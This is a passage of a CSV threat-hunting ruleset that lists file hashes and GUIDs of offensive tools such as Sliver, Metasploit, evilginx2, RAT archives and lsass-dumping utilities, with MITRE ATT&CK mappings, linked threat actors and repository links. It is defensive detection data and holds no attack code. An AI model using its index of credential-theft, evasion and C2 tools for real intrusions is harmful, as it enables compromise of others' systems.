"*c68f85a725ff87d40c7ba00d7ffc8e205048d8977a273327df653821a8a06e53*",".{0,1000}c68f85a725ff87d40c7ba00d7ffc8e205048d8977a273327df653821a8a06e53.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","37147" 
"*c690147b75389b32998feda3c01ec481fcc0e0dea1876b8ec00cd97846665557*",".{0,1000}c690147b75389b32998feda3c01ec481fcc0e0dea1876b8ec00cd97846665557.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","37148" "*c690e348e6aeb7b59b07a9872ea075ae73102081eeede8816a51534f77dbb62f*",".{0,1000}c690e348e6aeb7b59b07a9872ea075ae73102081eeede8816a51534f77dbb62f.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. 
attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","37149" "*c6911bc54aa83ecb15b78f6a9ebe8bdbd8b9a3d126001c503e6cc3358aed0657*",".{0,1000}c6911bc54aa83ecb15b78f6a9ebe8bdbd8b9a3d126001c503e6cc3358aed0657.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","37150" "*c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a*",".{0,1000}c6962ca89b28d1e9a7aa34b7de5c629e29a8eb732a0b8010406de83d0f2f8c2a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37151" "*c69727332807589ac1ed83cb794a36a98bf754d73d56063ba6a25bbeee71d6b1*",".{0,1000}c69727332807589ac1ed83cb794a36a98bf754d73d56063ba6a25bbeee71d6b1.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","37152" "*c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc*",".{0,1000}c6986103a201b81ebf196dd945c4bf5b1992b4fd8db03479d7be2595a5c467fc.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37153" "*c69b56a061711d9f4b9657ec0ba7aa0ce715185b025cc4c123de462743cde4f8*",".{0,1000}c69b56a061711d9f4b9657ec0ba7aa0ce715185b025cc4c123de462743cde4f8.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - 
T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","37154" "*c69d94f220f61721a55d3cea7e7b5d72ce0a9cf3b24620c8e41835cefe2267f0*",".{0,1000}c69d94f220f61721a55d3cea7e7b5d72ce0a9cf3b24620c8e41835cefe2267f0.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37155" "*c6a8607653837d746af95e31b26eb9a5de03cd396270cf5733ba6468a4027cfd*",".{0,1000}c6a8607653837d746af95e31b26eb9a5de03cd396270cf5733ba6468a4027cfd.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37156" "*c6a8d755e4764335fa9c5313c6ba641ac9a0228648065667f7d535457dbf0ceb*",".{0,1000}c6a8d755e4764335fa9c5313c6ba641ac9a0228648065667f7d535457dbf0ceb.{0,1000}","offensive_tool_keyword","TimeException","A tool to find folders excluded from AV real-time scanning using a time oracle","T1518.001 - T1070.004 - T1083","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/bananabr/TimeException","1","0","#filehash","N/A","8","3","233","16","2024-02-13T16:22:09Z","2022-07-19T02:47:52Z","37157" "*c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d*",".{0,1000}c6a9c538cf33c226c5ff0d37557c0d7d59c62bf37a2765fa090c1ee962edf02d.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - 
T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37158" "*c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16*",".{0,1000}c6aa399c903df33b37acf2e4d8a1e7f514d4e09f046e50dfe5efdb980cf34c16.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","37159" "*c6aea9877ddbdd222da02ccf3b094f68b7bcef85c3dd496b64a6960de177f29b*",".{0,1000}c6aea9877ddbdd222da02ccf3b094f68b7bcef85c3dd496b64a6960de177f29b.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","37160" "*c6b3f1648f7137df91606f6aaaa6d25d672e18c8adcb178c6d8cdcf3148a3c81*",".{0,1000}c6b3f1648f7137df91606f6aaaa6d25d672e18c8adcb178c6d8cdcf3148a3c81.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - 
T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37161" "*c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9*",".{0,1000}c6b8be2b81f56a9f4330f7ccae161bda9de8deaf375bb8d1150264aa6fb502e9.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","37163" "*c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95*",".{0,1000}c6bd027f5269a980cd4deffcdbdab77eb317db2a9737d727b55fe37710cd2f95.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","37164" "*c6d0fdd776065e3d211426e2f7cfd0f69e17af3e0c7479777b8a65e87517f54c*",".{0,1000}c6d0fdd776065e3d211426e2f7cfd0f69e17af3e0c7479777b8a65e87517f54c.{0,1000}","offensive_tool_keyword","gTunnel","tunelling solution written in golang","T1573.002 - T1071 - T1090 - T1105 - T1020","TA0005 - TA0010 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hotnops/gTunnel","1","0","#filehash","N/A","10","10","266","49","2023-05-17T05:24:58Z","2020-03-09T02:52:48Z","37167" 
"*c6d9d8cf99b21d48310621c5f02331d0d36253f742ed13f93a4de1db74a668ac*",".{0,1000}c6d9d8cf99b21d48310621c5f02331d0d36253f742ed13f93a4de1db74a668ac.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","37168" "*c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c*",".{0,1000}c6e09870a9f7d1e74d9364d7a4d27cc0ad96f1637ee3e60e2c2df5169972058c.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","#filehash","N/A","10","","N/A","","","","37170" "*c6e3c9a568baf4bc4c535b6c6de60b91af599e63bf3a3926f9d04f775a86b355*",".{0,1000}c6e3c9a568baf4bc4c535b6c6de60b91af599e63bf3a3926f9d04f775a86b355.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37171" "*c6e3cbe978095e155f6fafe6028c2f6a0a6e156a46d3473fb795c701ead2fd0b*",".{0,1000}c6e3cbe978095e155f6fafe6028c2f6a0a6e156a46d3473fb795c701ead2fd0b.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 
100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","#filehash","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","37172" "*c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20*",".{0,1000}c6ec76b8a6041bb25bd2699684ad58f63a6923aa1e4985438345fd99cdf11e20.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37173" "*c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f*",".{0,1000}c6faca2a240b79782651662d2de7511752a97dc187a93955bc83ef3e1b17326f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","37177" "*c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd*",".{0,1000}c6ffad5c09f5fb6fe7241d3fe9c9cd968ceea15e483a180ac45bd0b4e15d7bcd.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","37178" "*c702fa1d6618739e09cfb8e8cb79d563b1da757539bbee812748a79a0624e271*",".{0,1000}c702fa1d6618739e09cfb8e8cb79d563b1da757539bbee812748a79a0624e271.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. 
Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","37179" "*c7070018339311195621126010bad10ffa062b36835b834a16a648d5e27aeece*",".{0,1000}c7070018339311195621126010bad10ffa062b36835b834a16a648d5e27aeece.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","37183" "*c708b83f-4167-4b4c-a1db-d2011ecb3200*",".{0,1000}c708b83f\-4167\-4b4c\-a1db\-d2011ecb3200.{0,1000}","offensive_tool_keyword","o365enum","Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.","T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002","TA0040 - TA0010 - TA0007","N/A","N/A","Exploitation tool","https://github.com/gremwell/o365enum","1","0","#GUIDproject","N/A","7","3","267","39","2024-05-02T07:45:31Z","2020-02-18T12:22:50Z","37184" "*c70b1fd133737a21904159ed2a867e0105060ac74937472da5e4d0e1f6fa1645*",".{0,1000}c70b1fd133737a21904159ed2a867e0105060ac74937472da5e4d0e1f6fa1645.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR 
- Black Basta","C2","https://bruteratel.com/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","37185" "*c710f02d5ffdfe2b84a781b3da2d10b908d169c93fe1b91458829b28cb4dd473*",".{0,1000}c710f02d5ffdfe2b84a781b3da2d10b908d169c93fe1b91458829b28cb4dd473.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","0","#filehash","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","37187" "*c711f24519988ac03d68431f8db8190045a81e1068fe074666337cb32c7008f6*",".{0,1000}c711f24519988ac03d68431f8db8190045a81e1068fe074666337cb32c7008f6.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","37188" 
"*c71270964c15f42df8e82477be2e7c833c947f7be29f1ee269835b06360bc5d5*",".{0,1000}c71270964c15f42df8e82477be2e7c833c947f7be29f1ee269835b06360bc5d5.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","37189" "*C715155F-2BE8-44E0-BD34-2960067874C8*",".{0,1000}C715155F\-2BE8\-44E0\-BD34\-2960067874C8.{0,1000}","offensive_tool_keyword","ProxyLogon","ProxyLogon exploitation","T1190 - T1210 - T1213 - T1003 - T1059.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","Dispossessor","Exploitation tool","https://github.com/hausec/ProxyLogon","1","0","#GUIDproject","N/A","10","3","293","76","2024-07-02T10:00:00Z","2021-03-15T14:37:57Z","37190" "*c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c*",".{0,1000}c725919e6357126d512c638f993cf572112f323da359645e4088f789eb4c7b8c.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","0","#filehash","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","37191" "*c728e54e57a93ffbbe606d72fa12abb736236e7a1e263b49cf7e302de32f1100*",".{0,1000}c728e54e57a93ffbbe606d72fa12abb736236e7a1e263b49cf7e302de32f1100.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","37192" "*c729c62e99676b82fc639b5dc2877c044194933ae32406d532d8e5a8e86590af*",".{0,1000}c729c62e99676b82fc639b5dc2877c044194933ae32406d532d8e5a8e86590af.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","37193" "*c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253*",".{0,1000}c730a89142b73d047b4387f6f3f0d8dfacef57a2e4945a0a942cc72f0bd05253.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","37195" "*C73A4893-A5D1-44C8-900C-7B8850BBD2EC*",".{0,1000}C73A4893\-A5D1\-44C8\-900C\-7B8850BBD2EC.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege 
Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","FoxKitten - APT33 - Volatile Cedar - Sandworm","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","#GUIDproject","N/A","10","9","844","101","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z","37197" "*c742ea98e937cf3177ff80f3f1863798c1354cf4cefc8eabc677ce2fdb1f510c*",".{0,1000}c742ea98e937cf3177ff80f3f1863798c1354cf4cefc8eabc677ce2fdb1f510c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","37198" "*c74897b1e986e2876873abb3b5069bf1b103667f7f0e6b4581fbda3fd647a74a*",".{0,1000}c74897b1e986e2876873abb3b5069bf1b103667f7f0e6b4581fbda3fd647a74a.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","37199" "*c749894ea43c267418df93c7dd6b74ef25826d6c4a5461226ec800ae2efd1921*",".{0,1000}c749894ea43c267418df93c7dd6b74ef25826d6c4a5461226ec800ae2efd1921.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the 
password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","0","#filehash","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","37200" "*c74ba7419eb8528b153e3cb208fd06d0012884b1528fa4152aa7ee034d956a63*",".{0,1000}c74ba7419eb8528b153e3cb208fd06d0012884b1528fa4152aa7ee034d956a63.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","37201" "*c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794*",".{0,1000}c74f294042ccfc39dec052d9871e6bbd4e69b019a353f6e02947303adeac3794.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","37202" "*c75531e87d48c7411c2af2775fa62f4e0ef5b71103ef88cbbbbb544ed76279f8*",".{0,1000}c75531e87d48c7411c2af2775fa62f4e0ef5b71103ef88cbbbbb544ed76279f8.{0,1000}","offensive_tool_keyword","antSword","cross-platform website management toolkit - abused by attackers - supports the use of web shells","T1505.003 - T1059 - T1100 - T1027 - T1219 - T1071","TA0002 - TA0003 - TA0005 - TA0011","antSword webshell","APT41 - APT15","C2","https://github.com/AntSwordProject/antSword","1","0","#filehash","N/A","10","10","4010","616","2025-01-20T12:48:42Z","2016-03-11T09:28:00Z","37203" "*c7600f446daa53037a63ad765e0873a9c45adfd8944e5fee1c1586936ecf2928*",".{0,1000}c7600f446daa53037a63ad765e0873a9c45adfd8944e5fee1c1586936ecf2928.{0,1000}","offensive_tool_keyword","DriverDump","abusing the old process explorer driver to grab a privledged handle to lsass and then dump it","T1543 - T1548 - T1562 - T1003 - T1569","TA0005 - TA0003 - TA0004 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","37205" "*c768f3bc74ea36d42f2420d6cd47a8d997dddde569e774c9232ca68ff10c9a63*",".{0,1000}c768f3bc74ea36d42f2420d6cd47a8d997dddde569e774c9232ca68ff10c9a63.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. 
